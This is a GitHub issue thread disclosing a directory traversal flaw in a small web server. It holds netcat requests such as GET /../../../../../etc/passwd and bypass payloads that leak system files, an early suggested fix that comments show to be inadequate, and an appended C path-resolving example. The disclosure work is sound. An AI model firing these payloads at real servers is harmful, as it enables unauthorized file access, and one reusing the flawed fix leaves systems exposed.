security issue with requests outside of www root #2

Open
Cotix opened this issue Jul 5, 2016 · 3 comments

@Cotix Cotix commented Jul 5, 2016

It is possible to request parent directories.

cotix@lithium:~$ nc localhost 9999
GET /../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash
... my whole /etc/passwd

It is also possible to query absolute paths:

cotix@lithium:~$ nc localhost 9999
GET //etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash

@Cotix changed the title from "security issue with parent directory request" to "security issue with requests outside of www root" on Jul 5, 2016

@timsoftgit timsoftgit commented May 30, 2017

This can be fixed by changing the lines

 if(uri[0] == '/'){
         filename = uri + 1;

for

while (filename[0] == '/') { filename = filename+1; }

and removing the extra closing brace }.
It prevents the //etc/passwd style direct path hack and seems to prevent the /../../../etc/passwd style indirect directory hack as well.

@keymandll keymandll commented Jun 27, 2019

@timsoftgit doesn't it prevent the /../../../etc/passwd style attack because the URI ends up being ../../../etc/passwd style? I suggest you try your suggested fix with the below payload (URI) as well.

//../../../etc/passwd

@timsoftgit timsoftgit commented Jul 1, 2019

You're right. To do it properly you have to filter out all ../ recursively as well, otherwise something like ....//....//etc/passwd would also be a problem.
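
As an added example (not part of this thread or the project's code), here is one way to handle the request paths quoted above by resolving the URI segment by segment instead of stripping substrings. `safe_relpath` is a hypothetical name, and the URI is assumed to be percent-decoded already, with any query string removed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not the project's code. Maps an already
 * percent-decoded URI path (assumption) to a path relative to the www root.
 * Returns 0 on success, -1 if the path climbs above the root or overflows. */
int safe_relpath(const char *uri, char *out, size_t outlen)
{
    size_t len = 0;                        /* bytes used in out */
    const char *p = uri;

    if (outlen == 0) return -1;
    out[0] = '\0';
    for (;;) {
        while (*p == '/') p++;             /* "//etc" can never be absolute */
        size_t n = strcspn(p, "/");        /* length of next segment */
        if (n == 0) return 0;              /* end of input */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == 0) return -1;       /* ".." would leave the root */
            while (len > 0 && out[len - 1] != '/') len--;  /* pop segment */
            if (len > 0) len--;            /* and its separator */
        } else if (!(n == 1 && p[0] == '.')) {             /* skip "." */
            if (len + (len ? 1 : 0) + n + 1 > outlen) return -1;
            if (len) out[len++] = '/';
            memcpy(out + len, p, n);
            len += n;
        }
        out[len] = '\0';
        p += n;
    }
}

int main(void)
{
    /* The request paths quoted in this thread, plus one benign path. */
    const char *uris[] = { "/index.html", "/../../../../../etc/passwd",
                           "//etc/passwd", "//../../../etc/passwd",
                           "....//....//etc/passwd", "/a/./b/../c" };
    char rel[256];

    for (size_t i = 0; i < sizeof uris / sizeof uris[0]; i++) {
        if (safe_relpath(uris[i], rel, sizeof rel) == 0)
            printf("%-28s -> <wwwroot>/%s\n", uris[i], rel);
        else
            printf("%-28s -> rejected\n", uris[i]);
    }
    return 0;
}
```

This check is purely lexical: a segment such as `....` is treated as an ordinary name under the root, so no recursive stripping is needed. Symlinks inside the www root are not covered and still need a `realpath()` comparison against the root on the joined path.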
